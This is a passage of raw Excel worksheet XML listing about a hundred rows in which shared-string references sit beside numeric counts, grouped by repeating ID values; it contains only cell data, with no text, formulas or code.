      <c r="C12515">
        <v>2</v>
      </c>
      <c r="D12515">
        <v>1161</v>
      </c>
    </row>
    <row r="12516" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12516" t="s">
        <v>16223</v>
      </c>
      <c r="B12516" t="s">
        <v>16223</v>
      </c>
      <c r="C12516">
        <v>26</v>
      </c>
      <c r="D12516">
        <v>1161</v>
      </c>
    </row>
    <row r="12517" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12517" t="s">
        <v>16224</v>
      </c>
      <c r="B12517" t="s">
        <v>16224</v>
      </c>
      <c r="C12517">
        <v>1</v>
      </c>
      <c r="D12517">
        <v>1161</v>
      </c>
    </row>
    <row r="12518" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12518" t="s">
        <v>16228</v>
      </c>
      <c r="B12518" t="s">
        <v>16211</v>
      </c>
      <c r="C12518">
        <v>0</v>
      </c>
      <c r="D12518">
        <v>415</v>
      </c>
    </row>
    <row r="12519" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12519" t="s">
        <v>16231</v>
      </c>
      <c r="B12519" t="s">
        <v>16212</v>
      </c>
      <c r="C12519">
        <v>0</v>
      </c>
      <c r="D12519">
        <v>415</v>
      </c>
    </row>
    <row r="12520" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12520" t="s">
        <v>16228</v>
      </c>
      <c r="B12520" t="s">
        <v>16213</v>
      </c>
      <c r="C12520">
        <v>0</v>
      </c>
      <c r="D12520">
        <v>415</v>
      </c>
    </row>
    <row r="12521" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12521" t="s">
        <v>16231</v>
      </c>
      <c r="B12521" t="s">
        <v>16214</v>
      </c>
      <c r="C12521">
        <v>0</v>
      </c>
      <c r="D12521">
        <v>415</v>
      </c>
    </row>
    <row r="12522" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12522" t="s">
        <v>16228</v>
      </c>
      <c r="B12522" t="s">
        <v>16215</v>
      </c>
      <c r="C12522">
        <v>6</v>
      </c>
      <c r="D12522">
        <v>415</v>
      </c>
    </row>
    <row r="12523" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12523" t="s">
        <v>16231</v>
      </c>
      <c r="B12523" t="s">
        <v>16216</v>
      </c>
      <c r="C12523">
        <v>3</v>
      </c>
      <c r="D12523">
        <v>415</v>
      </c>
    </row>
    <row r="12524" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12524" t="s">
        <v>16228</v>
      </c>
      <c r="B12524" t="s">
        <v>16217</v>
      </c>
      <c r="C12524">
        <v>5</v>
      </c>
      <c r="D12524">
        <v>415</v>
      </c>
    </row>
    <row r="12525" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12525" t="s">
        <v>16231</v>
      </c>
      <c r="B12525" t="s">
        <v>16218</v>
      </c>
      <c r="C12525">
        <v>2</v>
      </c>
      <c r="D12525">
        <v>415</v>
      </c>
    </row>
    <row r="12526" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12526" t="s">
        <v>16229</v>
      </c>
      <c r="B12526" t="s">
        <v>16219</v>
      </c>
      <c r="C12526">
        <v>15</v>
      </c>
      <c r="D12526">
        <v>415</v>
      </c>
    </row>
    <row r="12527" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12527" t="s">
        <v>16230</v>
      </c>
      <c r="B12527" t="s">
        <v>16220</v>
      </c>
      <c r="C12527">
        <v>20</v>
      </c>
      <c r="D12527">
        <v>415</v>
      </c>
    </row>
    <row r="12528" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12528" t="s">
        <v>16229</v>
      </c>
      <c r="B12528" t="s">
        <v>16221</v>
      </c>
      <c r="C12528">
        <v>8</v>
      </c>
      <c r="D12528">
        <v>415</v>
      </c>
    </row>
    <row r="12529" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12529" t="s">
        <v>16230</v>
      </c>
      <c r="B12529" t="s">
        <v>16222</v>
      </c>
      <c r="C12529">
        <v>20</v>
      </c>
      <c r="D12529">
        <v>415</v>
      </c>
    </row>
    <row r="12530" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12530" t="s">
        <v>16223</v>
      </c>
      <c r="B12530" t="s">
        <v>16223</v>
      </c>
      <c r="C12530">
        <v>26</v>
      </c>
      <c r="D12530">
        <v>415</v>
      </c>
    </row>
    <row r="12531" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12531" t="s">
        <v>16224</v>
      </c>
      <c r="B12531" t="s">
        <v>16224</v>
      </c>
      <c r="C12531">
        <v>1</v>
      </c>
      <c r="D12531">
        <v>415</v>
      </c>
    </row>
    <row r="12532" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12532" t="s">
        <v>16228</v>
      </c>
      <c r="B12532" t="s">
        <v>16211</v>
      </c>
      <c r="C12532">
        <v>0</v>
      </c>
      <c r="D12532">
        <v>597</v>
      </c>
    </row>
    <row r="12533" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12533" t="s">
        <v>16231</v>
      </c>
      <c r="B12533" t="s">
        <v>16212</v>
      </c>
      <c r="C12533">
        <v>0</v>
      </c>
      <c r="D12533">
        <v>597</v>
      </c>
    </row>
    <row r="12534" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12534" t="s">
        <v>16228</v>
      </c>
      <c r="B12534" t="s">
        <v>16213</v>
      </c>
      <c r="C12534">
        <v>0</v>
      </c>
      <c r="D12534">
        <v>597</v>
      </c>
    </row>
    <row r="12535" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12535" t="s">
        <v>16231</v>
      </c>
      <c r="B12535" t="s">
        <v>16214</v>
      </c>
      <c r="C12535">
        <v>0</v>
      </c>
      <c r="D12535">
        <v>597</v>
      </c>
    </row>
    <row r="12536" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12536" t="s">
        <v>16228</v>
      </c>
      <c r="B12536" t="s">
        <v>16215</v>
      </c>
      <c r="C12536">
        <v>1</v>
      </c>
      <c r="D12536">
        <v>597</v>
      </c>
    </row>
    <row r="12537" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12537" t="s">
        <v>16231</v>
      </c>
      <c r="B12537" t="s">
        <v>16216</v>
      </c>
      <c r="C12537">
        <v>3</v>
      </c>
      <c r="D12537">
        <v>597</v>
      </c>
    </row>
    <row r="12538" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12538" t="s">
        <v>16228</v>
      </c>
      <c r="B12538" t="s">
        <v>16217</v>
      </c>
      <c r="C12538">
        <v>1</v>
      </c>
      <c r="D12538">
        <v>597</v>
      </c>
    </row>
    <row r="12539" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12539" t="s">
        <v>16231</v>
      </c>
      <c r="B12539" t="s">
        <v>16218</v>
      </c>
      <c r="C12539">
        <v>6</v>
      </c>
      <c r="D12539">
        <v>597</v>
      </c>
    </row>
    <row r="12540" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12540" t="s">
        <v>16229</v>
      </c>
      <c r="B12540" t="s">
        <v>16219</v>
      </c>
      <c r="C12540">
        <v>0</v>
      </c>
      <c r="D12540">
        <v>597</v>
      </c>
    </row>
    <row r="12541" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12541" t="s">
        <v>16230</v>
      </c>
      <c r="B12541" t="s">
        <v>16220</v>
      </c>
      <c r="C12541">
        <v>0</v>
      </c>
      <c r="D12541">
        <v>597</v>
      </c>
    </row>
    <row r="12542" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12542" t="s">
        <v>16229</v>
      </c>
      <c r="B12542" t="s">
        <v>16221</v>
      </c>
      <c r="C12542">
        <v>0</v>
      </c>
      <c r="D12542">
        <v>597</v>
      </c>
    </row>
    <row r="12543" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12543" t="s">
        <v>16230</v>
      </c>
      <c r="B12543" t="s">
        <v>16222</v>
      </c>
      <c r="C12543">
        <v>0</v>
      </c>
      <c r="D12543">
        <v>597</v>
      </c>
    </row>
    <row r="12544" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12544" t="s">
        <v>16223</v>
      </c>
      <c r="B12544" t="s">
        <v>16223</v>
      </c>
      <c r="C12544">
        <v>25</v>
      </c>
      <c r="D12544">
        <v>597</v>
      </c>
    </row>
    <row r="12545" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12545" t="s">
        <v>16224</v>
      </c>
      <c r="B12545" t="s">
        <v>16224</v>
      </c>
      <c r="C12545">
        <v>0</v>
      </c>
      <c r="D12545">
        <v>597</v>
      </c>
    </row>
    <row r="12546" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12546" t="s">
        <v>16228</v>
      </c>
      <c r="B12546" t="s">
        <v>16215</v>
      </c>
      <c r="C12546">
        <v>4</v>
      </c>
      <c r="D12546">
        <v>597</v>
      </c>
    </row>
    <row r="12547" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12547" t="s">
        <v>16231</v>
      </c>
      <c r="B12547" t="s">
        <v>16218</v>
      </c>
      <c r="C12547">
        <v>7</v>
      </c>
      <c r="D12547">
        <v>597</v>
      </c>
    </row>
    <row r="12548" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12548" t="s">
        <v>16228</v>
      </c>
      <c r="B12548" t="s">
        <v>16211</v>
      </c>
      <c r="C12548">
        <v>0</v>
      </c>
      <c r="D12548">
        <v>1068</v>
      </c>
    </row>
    <row r="12549" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12549" t="s">
        <v>16231</v>
      </c>
      <c r="B12549" t="s">
        <v>16212</v>
      </c>
      <c r="C12549">
        <v>0</v>
      </c>
      <c r="D12549">
        <v>1068</v>
      </c>
    </row>
    <row r="12550" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12550" t="s">
        <v>16228</v>
      </c>
      <c r="B12550" t="s">
        <v>16213</v>
      </c>
      <c r="C12550">
        <v>0</v>
      </c>
      <c r="D12550">
        <v>1068</v>
      </c>
    </row>
    <row r="12551" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12551" t="s">
        <v>16231</v>
      </c>
      <c r="B12551" t="s">
        <v>16214</v>
      </c>
      <c r="C12551">
        <v>0</v>
      </c>
      <c r="D12551">
        <v>1068</v>
      </c>
    </row>
    <row r="12552" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12552" t="s">
        <v>16228</v>
      </c>
      <c r="B12552" t="s">
        <v>16215</v>
      </c>
      <c r="C12552">
        <v>0</v>
      </c>
      <c r="D12552">
        <v>1068</v>
      </c>
    </row>
    <row r="12553" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12553" t="s">
        <v>16231</v>
      </c>
      <c r="B12553" t="s">
        <v>16216</v>
      </c>
      <c r="C12553">
        <v>1</v>
      </c>
      <c r="D12553">
        <v>1068</v>
      </c>
    </row>
    <row r="12554" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12554" t="s">
        <v>16228</v>
      </c>
      <c r="B12554" t="s">
        <v>16217</v>
      </c>
      <c r="C12554">
        <v>2</v>
      </c>
      <c r="D12554">
        <v>1068</v>
      </c>
    </row>
    <row r="12555" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12555" t="s">
        <v>16231</v>
      </c>
      <c r="B12555" t="s">
        <v>16218</v>
      </c>
      <c r="C12555">
        <v>0</v>
      </c>
      <c r="D12555">
        <v>1068</v>
      </c>
    </row>
    <row r="12556" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12556" t="s">
        <v>16229</v>
      </c>
      <c r="B12556" t="s">
        <v>16219</v>
      </c>
      <c r="C12556">
        <v>0</v>
      </c>
      <c r="D12556">
        <v>1068</v>
      </c>
    </row>
    <row r="12557" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12557" t="s">
        <v>16230</v>
      </c>
      <c r="B12557" t="s">
        <v>16220</v>
      </c>
      <c r="C12557">
        <v>0</v>
      </c>
      <c r="D12557">
        <v>1068</v>
      </c>
    </row>
    <row r="12558" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12558" t="s">
        <v>16229</v>
      </c>
      <c r="B12558" t="s">
        <v>16221</v>
      </c>
      <c r="C12558">
        <v>12</v>
      </c>
      <c r="D12558">
        <v>1068</v>
      </c>
    </row>
    <row r="12559" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12559" t="s">
        <v>16230</v>
      </c>
      <c r="B12559" t="s">
        <v>16222</v>
      </c>
      <c r="C12559">
        <v>0</v>
      </c>
      <c r="D12559">
        <v>1068</v>
      </c>
    </row>
    <row r="12560" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12560" t="s">
        <v>16223</v>
      </c>
      <c r="B12560" t="s">
        <v>16223</v>
      </c>
      <c r="C12560">
        <v>26</v>
      </c>
      <c r="D12560">
        <v>1068</v>
      </c>
    </row>
    <row r="12561" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12561" t="s">
        <v>16224</v>
      </c>
      <c r="B12561" t="s">
        <v>16224</v>
      </c>
      <c r="C12561">
        <v>1</v>
      </c>
      <c r="D12561">
        <v>1068</v>
      </c>
    </row>
    <row r="12562" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12562" t="s">
        <v>16228</v>
      </c>
      <c r="B12562" t="s">
        <v>16211</v>
      </c>
      <c r="C12562">
        <v>1</v>
      </c>
      <c r="D12562">
        <v>1245</v>
      </c>
    </row>
    <row r="12563" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12563" t="s">
        <v>16231</v>
      </c>
      <c r="B12563" t="s">
        <v>16212</v>
      </c>
      <c r="C12563">
        <v>0</v>
      </c>
      <c r="D12563">
        <v>1245</v>
      </c>
    </row>
    <row r="12564" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12564" t="s">
        <v>16228</v>
      </c>
      <c r="B12564" t="s">
        <v>16213</v>
      </c>
      <c r="C12564">
        <v>0</v>
      </c>
      <c r="D12564">
        <v>1245</v>
      </c>
    </row>
    <row r="12565" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12565" t="s">
        <v>16231</v>
      </c>
      <c r="B12565" t="s">
        <v>16214</v>
      </c>
      <c r="C12565">
        <v>1</v>
      </c>
      <c r="D12565">
        <v>1245</v>
      </c>
    </row>
    <row r="12566" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12566" t="s">
        <v>16228</v>
      </c>
      <c r="B12566" t="s">
        <v>16215</v>
      </c>
      <c r="C12566">
        <v>13</v>
      </c>
      <c r="D12566">
        <v>1245</v>
      </c>
    </row>
    <row r="12567" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12567" t="s">
        <v>16231</v>
      </c>
      <c r="B12567" t="s">
        <v>16216</v>
      </c>
      <c r="C12567">
        <v>10</v>
      </c>
      <c r="D12567">
        <v>1245</v>
      </c>
    </row>
    <row r="12568" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12568" t="s">
        <v>16228</v>
      </c>
      <c r="B12568" t="s">
        <v>16217</v>
      </c>
      <c r="C12568">
        <v>24</v>
      </c>
      <c r="D12568">
        <v>1245</v>
      </c>
    </row>
    <row r="12569" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12569" t="s">
        <v>16231</v>
      </c>
      <c r="B12569" t="s">
        <v>16218</v>
      </c>
      <c r="C12569">
        <v>10</v>
      </c>
      <c r="D12569">
        <v>1245</v>
      </c>
    </row>
    <row r="12570" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12570" t="s">
        <v>16229</v>
      </c>
      <c r="B12570" t="s">
        <v>16219</v>
      </c>
      <c r="C12570">
        <v>1</v>
      </c>
      <c r="D12570">
        <v>1245</v>
      </c>
    </row>
    <row r="12571" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12571" t="s">
        <v>16230</v>
      </c>
      <c r="B12571" t="s">
        <v>16220</v>
      </c>
      <c r="C12571">
        <v>1</v>
      </c>
      <c r="D12571">
        <v>1245</v>
      </c>
    </row>
    <row r="12572" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12572" t="s">
        <v>16229</v>
      </c>
      <c r="B12572" t="s">
        <v>16221</v>
      </c>
      <c r="C12572">
        <v>139</v>
      </c>
      <c r="D12572">
        <v>1245</v>
      </c>
    </row>
    <row r="12573" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12573" t="s">
        <v>16230</v>
      </c>
      <c r="B12573" t="s">
        <v>16222</v>
      </c>
      <c r="C12573">
        <v>268</v>
      </c>
      <c r="D12573">
        <v>1245</v>
      </c>
    </row>
    <row r="12574" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12574" t="s">
        <v>16223</v>
      </c>
      <c r="B12574" t="s">
        <v>16223</v>
      </c>
      <c r="C12574">
        <v>25</v>
      </c>
      <c r="D12574">
        <v>1245</v>
      </c>
    </row>
    <row r="12575" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12575" t="s">
        <v>16224</v>
      </c>
      <c r="B12575" t="s">
        <v>16224</v>
      </c>
      <c r="C12575">
        <v>1</v>
      </c>
      <c r="D12575">
        <v>1245</v>
      </c>
    </row>
    <row r="12576" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12576" t="s">
        <v>16228</v>
      </c>
      <c r="B12576" t="s">
        <v>16211</v>
      </c>
      <c r="C12576">
        <v>0</v>
      </c>
      <c r="D12576">
        <v>551</v>
      </c>
    </row>
    <row r="12577" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12577" t="s">
        <v>16231</v>
      </c>
      <c r="B12577" t="s">
        <v>16212</v>
      </c>
      <c r="C12577">
        <v>0</v>
      </c>
      <c r="D12577">
        <v>551</v>
      </c>
    </row>
    <row r="12578" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12578" t="s">
        <v>16228</v>
      </c>
      <c r="B12578" t="s">
        <v>16213</v>
      </c>
      <c r="C12578">
        <v>0</v>
      </c>
      <c r="D12578">
        <v>551</v>
      </c>
    </row>
    <row r="12579" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12579" t="s">
        <v>16231</v>
      </c>
      <c r="B12579" t="s">
        <v>16214</v>
      </c>
      <c r="C12579">
        <v>0</v>
      </c>
      <c r="D12579">
        <v>551</v>
      </c>
    </row>
    <row r="12580" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12580" t="s">
        <v>16228</v>
      </c>
      <c r="B12580" t="s">
        <v>16215</v>
      </c>
      <c r="C12580">
        <v>0</v>
      </c>
      <c r="D12580">
        <v>551</v>
      </c>
    </row>
    <row r="12581" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12581" t="s">
        <v>16231</v>
      </c>
      <c r="B12581" t="s">
        <v>16216</v>
      </c>
      <c r="C12581">
        <v>2</v>
      </c>
      <c r="D12581">
        <v>551</v>
      </c>
    </row>
    <row r="12582" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12582" t="s">
        <v>16228</v>
      </c>
      <c r="B12582" t="s">
        <v>16217</v>
      </c>
      <c r="C12582">
        <v>13</v>
      </c>
      <c r="D12582">
        <v>551</v>
      </c>
    </row>
    <row r="12583" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12583" t="s">
        <v>16231</v>
      </c>
      <c r="B12583" t="s">
        <v>16218</v>
      </c>
      <c r="C12583">
        <v>0</v>
      </c>
      <c r="D12583">
        <v>551</v>
      </c>
    </row>
    <row r="12584" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12584" t="s">
        <v>16229</v>
      </c>
      <c r="B12584" t="s">
        <v>16219</v>
      </c>
      <c r="C12584">
        <v>0</v>
      </c>
      <c r="D12584">
        <v>551</v>
      </c>
    </row>
    <row r="12585" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12585" t="s">
        <v>16230</v>
      </c>
      <c r="B12585" t="s">
        <v>16220</v>
      </c>
      <c r="C12585">
        <v>1</v>
      </c>
      <c r="D12585">
        <v>551</v>
      </c>
    </row>
    <row r="12586" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12586" t="s">
        <v>16229</v>
      </c>
      <c r="B12586" t="s">
        <v>16221</v>
      </c>
      <c r="C12586">
        <v>7</v>
      </c>
      <c r="D12586">
        <v>551</v>
      </c>
    </row>
    <row r="12587" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12587" t="s">
        <v>16230</v>
      </c>
      <c r="B12587" t="s">
        <v>16222</v>
      </c>
      <c r="C12587">
        <v>2</v>
      </c>
      <c r="D12587">
        <v>551</v>
      </c>
    </row>
    <row r="12588" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12588" t="s">
        <v>16223</v>
      </c>
      <c r="B12588" t="s">
        <v>16223</v>
      </c>
      <c r="C12588">
        <v>21</v>
      </c>
      <c r="D12588">
        <v>551</v>
      </c>
    </row>
    <row r="12589" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12589" t="s">
        <v>16224</v>
      </c>
      <c r="B12589" t="s">
        <v>16224</v>
      </c>
      <c r="C12589">
        <v>0</v>
      </c>
      <c r="D12589">
        <v>551</v>
      </c>
    </row>
    <row r="12590" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12590" t="s">
        <v>16228</v>
      </c>
      <c r="B12590" t="s">
        <v>16211</v>
      </c>
      <c r="C12590">
        <v>1</v>
      </c>
      <c r="D12590">
        <v>791</v>
      </c>
    </row>
    <row r="12591" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12591" t="s">
        <v>16231</v>
      </c>
      <c r="B12591" t="s">
        <v>16212</v>
      </c>
      <c r="C12591">
        <v>0</v>
      </c>
      <c r="D12591">
        <v>791</v>
      </c>
    </row>
    <row r="12592" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12592" t="s">
        <v>16228</v>
      </c>
      <c r="B12592" t="s">
        <v>16213</v>
      </c>
      <c r="C12592">
        <v>0</v>
      </c>
      <c r="D12592">
        <v>791</v>
      </c>
    </row>
    <row r="12593" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12593" t="s">
        <v>16231</v>
      </c>
      <c r="B12593" t="s">
        <v>16214</v>
      </c>
      <c r="C12593">
        <v>0</v>
      </c>
      <c r="D12593">
        <v>791</v>
      </c>
    </row>
    <row r="12594" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12594" t="s">
        <v>16228</v>
      </c>
      <c r="B12594" t="s">
        <v>16215</v>
      </c>
      <c r="C12594">
        <v>1</v>
      </c>
      <c r="D12594">
        <v>791</v>
      </c>
    </row>
    <row r="12595" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12595" t="s">
        <v>16231</v>
      </c>
      <c r="B12595" t="s">
        <v>16216</v>
      </c>
      <c r="C12595">
        <v>2</v>
      </c>
      <c r="D12595">
        <v>791</v>
      </c>
    </row>
    <row r="12596" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12596" t="s">
        <v>16228</v>
      </c>
      <c r="B12596" t="s">
        <v>16217</v>
      </c>
      <c r="C12596">
        <v>3</v>
      </c>
      <c r="D12596">
        <v>791</v>
      </c>
    </row>
    <row r="12597" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12597" t="s">
        <v>16231</v>
      </c>
      <c r="B12597" t="s">
        <v>16218</v>
      </c>
      <c r="C12597">
        <v>0</v>
      </c>
      <c r="D12597">
        <v>791</v>
      </c>
    </row>
    <row r="12598" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12598" t="s">
        <v>16229</v>
      </c>
      <c r="B12598" t="s">
        <v>16219</v>
      </c>
      <c r="C12598">
        <v>1</v>
      </c>
      <c r="D12598">
        <v>791</v>
      </c>
    </row>
    <row r="12599" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12599" t="s">
        <v>16230</v>
      </c>
      <c r="B12599" t="s">
        <v>16220</v>
      </c>
      <c r="C12599">
        <v>2</v>
      </c>
      <c r="D12599">
        <v>791</v>
      </c>
    </row>
    <row r="12600" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12600" t="s">
        <v>16229</v>
      </c>
      <c r="B12600" t="s">
        <v>16221</v>
      </c>
      <c r="C12600">
        <v>9</v>
      </c>
      <c r="D12600">
        <v>791</v>
      </c>
    </row>
    <row r="12601" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12601" t="s">
        <v>16230</v>
      </c>
      <c r="B12601" t="s">
        <v>16222</v>
      </c>
      <c r="C12601">
        <v>18</v>
      </c>
      <c r="D12601">
        <v>791</v>
      </c>
    </row>
    <row r="12602" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12602" t="s">
        <v>16223</v>
      </c>
      <c r="B12602" t="s">
        <v>16223</v>
      </c>
      <c r="C12602">
        <v>6</v>
      </c>
      <c r="D12602">
        <v>791</v>
      </c>
    </row>
    <row r="12603" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12603" t="s">
        <v>16224</v>
      </c>
      <c r="B12603" t="s">
        <v>16224</v>
      </c>
      <c r="C12603">
        <v>1</v>
      </c>
      <c r="D12603">
        <v>791</v>
      </c>
    </row>
    <row r="12604" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12604" t="s">
        <v>16228</v>
      </c>
      <c r="B12604" t="s">
        <v>16217</v>
      </c>
      <c r="C12604">
        <v>8</v>
      </c>
      <c r="D12604">
        <v>1295</v>
      </c>
    </row>
    <row r="12605" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12605" t="s">
        <v>16228</v>
      </c>
      <c r="B12605" t="s">
        <v>16211</v>
      </c>
      <c r="C12605">
        <v>0</v>
      </c>
      <c r="D12605">
        <v>5007</v>
      </c>
    </row>
    <row r="12606" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12606" t="s">
        <v>16231</v>
      </c>
      <c r="B12606" t="s">
        <v>16212</v>
      </c>
      <c r="C12606">
        <v>0</v>
      </c>
      <c r="D12606">
        <v>5007</v>
      </c>
    </row>
    <row r="12607" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12607" t="s">
        <v>16228</v>
      </c>
      <c r="B12607" t="s">
        <v>16213</v>
      </c>
      <c r="C12607">
        <v>0</v>
      </c>
      <c r="D12607">
        <v>5007</v>
      </c>
    </row>
    <row r="12608" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12608" t="s">
        <v>16231</v>
      </c>
      <c r="B12608" t="s">
        <v>16214</v>
      </c>
      <c r="C12608">
        <v>0</v>
      </c>
      <c r="D12608">
        <v>5007</v>
      </c>
    </row>
    <row r="12609" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12609" t="s">
        <v>16228</v>
      </c>
      <c r="B12609" t="s">
        <v>16215</v>
      </c>
      <c r="C12609">
        <v>0</v>
      </c>
      <c r="D12609">
        <v>5007</v>
      </c>
    </row>
    <row r="12610" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12610" t="s">
        <v>16231</v>
      </c>
      <c r="B12610" t="s">
        <v>16216</v>
      </c>
      <c r="C12610">
        <v>1</v>
      </c>
      <c r="D12610">
        <v>5007</v>
      </c>
    </row>
    <row r="12611" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12611" t="s">
        <v>16228</v>
      </c>
      <c r="B12611" t="s">
        <v>16217</v>
      </c>
      <c r="C12611">
        <v>0</v>
      </c>
      <c r="D12611">
        <v>5007</v>
      </c>
    </row>
    <row r="12612" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12612" t="s">
        <v>16231</v>
      </c>
      <c r="B12612" t="s">
        <v>16218</v>
      </c>
      <c r="C12612">
        <v>0</v>
      </c>
      <c r="D12612">
        <v>5007</v>
      </c>
    </row>
    <row r="12613" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12613" t="s">
        <v>16229</v>
      </c>
      <c r="B12613" t="s">
        <v>16219</v>
      </c>
      <c r="C12613">
        <v>0</v>
      </c>
      <c r="D12613">
        <v>5007</v>
      </c>
    </row>
    <row r="12614" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12614" t="s">
        <v>16230</v>
      </c>
      <c r="B12614" t="s">
        <v>16220</v>
      </c>
      <c r="C12614">
        <v>1</v>
      </c>
      <c r="D12614">
        <v>5007</v>
      </c>
    </row>
    <row r="12615" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12615" t="s">
        <v>16229</v>
      </c>
      <c r="B12615" t="s">
        <v>16221</v>
      </c>
      <c r="C12615">
        <v>28</v>
      </c>
      <c r="D12615">
        <v>5007</v>
      </c>
    </row>
    <row r="12616" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12616" t="s">
        <v>16230</v>
      </c>
      <c r="B12616" t="s">
        <v>16222</v>
      </c>
      <c r="C12616">
        <v>37</v>
      </c>
      <c r="D12616">
        <v>5007</v>
      </c>
    </row>
    <row r="12617" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12617" t="s">
        <v>16223</v>
      </c>
      <c r="B12617" t="s">
        <v>16223</v>
      </c>
      <c r="C12617">
        <v>26</v>
      </c>
      <c r="D12617">
        <v>5007</v>
      </c>
    </row>
    <row r="12618" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12618" t="s">
        <v>16224</v>
      </c>
      <c r="B12618" t="s">
        <v>16224</v>
      </c>
      <c r="C12618">
        <v>1</v>
      </c>
      <c r="D12618">
        <v>5007</v>
      </c>
    </row>
    <row r="12619" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12619" t="s">
        <v>16228</v>
      </c>
      <c r="B12619" t="s">
        <v>16211</v>
      </c>
      <c r="C12619">
        <v>0</v>
      </c>
      <c r="D12619">
        <v>2209</v>
      </c>
    </row>
    <row r="12620" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12620" t="s">
        <v>16231</v>
      </c>
      <c r="B12620" t="s">
        <v>16212</v>
      </c>
      <c r="C12620">
        <v>0</v>
      </c>
      <c r="D12620">
